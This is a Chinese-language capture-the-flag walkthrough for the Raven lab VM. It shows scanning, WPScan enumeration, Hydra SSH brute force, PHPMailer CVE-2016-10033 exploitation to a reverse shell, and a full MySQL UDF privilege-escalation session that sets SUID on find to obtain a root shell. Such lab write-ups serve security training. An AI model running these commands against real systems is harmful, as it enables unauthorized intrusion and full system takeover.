渗透测试-靶机Raven

攻击机 ip：192.168.195.133
靶机 ip：192.168.195.139

1. 探测存活主机

root@kali:~# arp-scan -l

1.png

2. 端口探测（nmap为例）

root@kali:~# nmap -sV -p- 192.168.195.139

2.png

3. 使用 Dirbuster 工具进行敏感目录扫描

• 方法一
  
  3.png
  
  其中通过访问vendor目录发现PHPMailerAutoload.php文件，查询后发现CVE-2016-10033是PHPMailer中存在的高危安全漏洞，攻击者只需巧妙地构造出一个恶意邮箱地址，即可写入任意文件，造成远程命令执行的危害。（见方法二）

4.png

通过访问service.html查看源代码发现flag

5.png

4. 由于发现wordpress目录，所以使用Wpscan扫描
   Wpscan是一个扫描WordPress漏洞的黑盒子扫描器，可以扫描出wordpress的版本，主题，插件，后台用户以及爆破后台用户密码等

root@kali:~# wpscan --url "http://192.168.195.139/wordpress" -e u vp
-e 枚举方式
u id 为1-10的用户名
vp 扫描脆弱插件

探测到两个用户名，如图

6.png

5. 使用hydra对其进行SSH爆破

root@kali:~# hydra -l michael -P '/root/Desktop/常用密码.dict' -V -o ssh.log 192.168.195.139 ssh

破解出密码：“michael”（em...我其实没破解出来）

6. 成功登录ssh

root@kali:~#ssh [email protected]

7.png

查询到 /var/www目录下存放flag2.txt

michael@Raven:/var/www$ cat flag2.txt

8.png

在wordpress的wp_config.php里找到mysql的账户密码

michael@Raven:/var/www/html/wordpress$ vi wp-config.php

9.png

7. 上传一个大马并访问
   通过连接mysql查询到flag3 flag4
   
   10.png

11.png

8. 提权
   对steven的hash值进行md5解密得到pink84
   
   12.png
   
   
   13.png
   
   由python -c ’import pty; pty.spawn("/bin/sh")’得到一个可以交互的shell，在有root密码的前提下可以su,steven是root账户
   
   14.png
   
   成功提权至root账户

• 方法二

利用PHPMailer命令执行以及mysql udf提权

使用kali搜索漏洞有关的代码库

searchspolit phpmailer

15.png

探测到PHPMailer版本为5.2.16，这里使用pythohn远程代码执行脚本

16.png

拷贝脚本到本地

cp /usr/share/exploitdb/platforms/php/webapps/40974.py /

17.png

查看并修改相关参数

18.png

编译运行代码，成功运行后将在文件根目录下生成 wcute.php文件

19.png

本地开启监听，wcute.php 文件运行后shell成功反弹

20.png

使用python -c ’import pty; pty.spawn("/bin/bash")’得到一个可以交互的shell

21.png

在wordpress的wp_config.php里找到mysql的账户密码

michael@Raven:/var/www/html/wordpress$ vi wp-config.php

22.png

使用netstat -a发现mysql服务启动

23.png

查看进程发现mysql是以root权限运行的，此时想到了mysql提权，这里以udf提权为例

24.png

查询到mysql udf提权exp编号为1518，拷贝exp到本地/var/www/html

cp /usr...... /var/www/html

25.png

编译生成动态链接库文件，方便上传至靶机

26.png

使用wget上传至靶机(主机开启Apache服务)

27.png

靶机连接mysql开始进行提权操作

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.22 sec)

mysql> use wordpress
use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.43 sec)

mysql> insert into foo values(load_file('/var/www/html/1518.so'));
insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.10 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.06 sec)

mysql> create function do_system returns integer soname '1518.so';
create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.10 sec)

mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.02 sec)
mysql> quit
quit
Bye
www-data@Raven:/var/www/html$ touch foo
touch foo
www-data@Raven:/var/www/html$ find foo -exec 'whoami' \;
find foo -exec 'whoami' \;
root
www-data@Raven:/var/www/html$ find foo -exec '/bin/sh' \;
find foo -exec '/bin/sh' \;
# whoami
whoami
root
# pwd
pwd
/var/www/html
# cd /root
cd /root
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
______

| ___ \

| |_/ /__ ___   _____ _ __

|    // _` \ \ / / _ \ '_ \

| |\ \ (_| |\ V /  __/ | | |

\_| \_\__,_| \_/ \___|_| |_|


flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io

成功提权

参考链接：
https://www.anquanke.com/post/id/163996
https://www.cnblogs.com/bmjoker/p/10034001.html